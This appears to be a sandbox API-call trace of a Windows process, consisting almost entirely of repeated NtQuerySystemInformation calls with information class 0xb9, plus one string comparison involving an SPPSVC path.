NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee30, Length=0x28, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee30, Length=0x28, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee30, Length=0x28, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x28, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x38, ResultLength=0x0) [0232.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef20, Length=0x28, ResultLength=0x0) [0232.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef20, Length=0x28, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x38, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee80, Length=0x20, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee00, Length=0x20, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee00, Length=0x20, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee00, Length=0x20, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x38, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee80, Length=0x20, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee10, Length=0x20, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee10, Length=0x20, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0d0, Length=0x50, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff050, Length=0x28, ResultLength=0x0) [0232.986] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0d0, Length=0x50, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0d0, Length=0x50, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0d0, Length=0x50, ResultLength=0x0) [0232.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x38, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee30, Length=0x28, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee30, Length=0x28, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee30, Length=0x28, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x28, ResultLength=0x0) [0232.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x38, ResultLength=0x0) [0232.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef20, Length=0x28, ResultLength=0x0) [0232.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef20, Length=0x28, ResultLength=0x0) [0232.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x38, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee80, Length=0x20, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee00, Length=0x20, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee00, Length=0x20, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee00, Length=0x20, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x38, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee80, Length=0x20, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee10, Length=0x20, ResultLength=0x0) [0232.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee10, Length=0x20, ResultLength=0x0) [0232.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea10, Length=0x50, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea10, Length=0x50, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea10, Length=0x50, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe900, Length=0x50, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe900, Length=0x50, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe900, Length=0x50, ResultLength=0x0) [0233.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe900, Length=0x50, ResultLength=0x0) [0233.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe830, Length=0x38, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe660, Length=0x28, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe660, Length=0x28, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe660, Length=0x28, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe660, Length=0x28, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6d0, Length=0x28, ResultLength=0x0) [0233.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe830, Length=0x38, ResultLength=0x0) [0233.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe750, Length=0x28, ResultLength=0x0) [0233.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe750, Length=0x28, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe830, Length=0x38, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6b0, Length=0x20, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe630, Length=0x20, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe630, Length=0x20, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe630, Length=0x20, ResultLength=0x0) [0233.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe830, Length=0x38, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6b0, Length=0x20, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe640, Length=0x20, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe640, Length=0x20, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea10, Length=0x50, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea10, Length=0x50, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea10, Length=0x50, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe900, Length=0x50, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe900, Length=0x50, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe900, Length=0x50, ResultLength=0x0) [0233.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe900, Length=0x50, ResultLength=0x0) [0233.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe830, Length=0x38, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe660, Length=0x28, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe660, Length=0x28, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe660, Length=0x28, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe660, Length=0x28, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6d0, Length=0x28, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe830, Length=0x38, ResultLength=0x0) [0233.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe750, Length=0x28, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe750, Length=0x28, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe830, Length=0x38, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6b0, Length=0x20, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe630, Length=0x20, ResultLength=0x0) [0233.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe630, Length=0x20, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe630, Length=0x20, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe830, Length=0x38, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6b0, Length=0x20, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe640, Length=0x20, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe640, Length=0x20, ResultLength=0x0) [0233.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 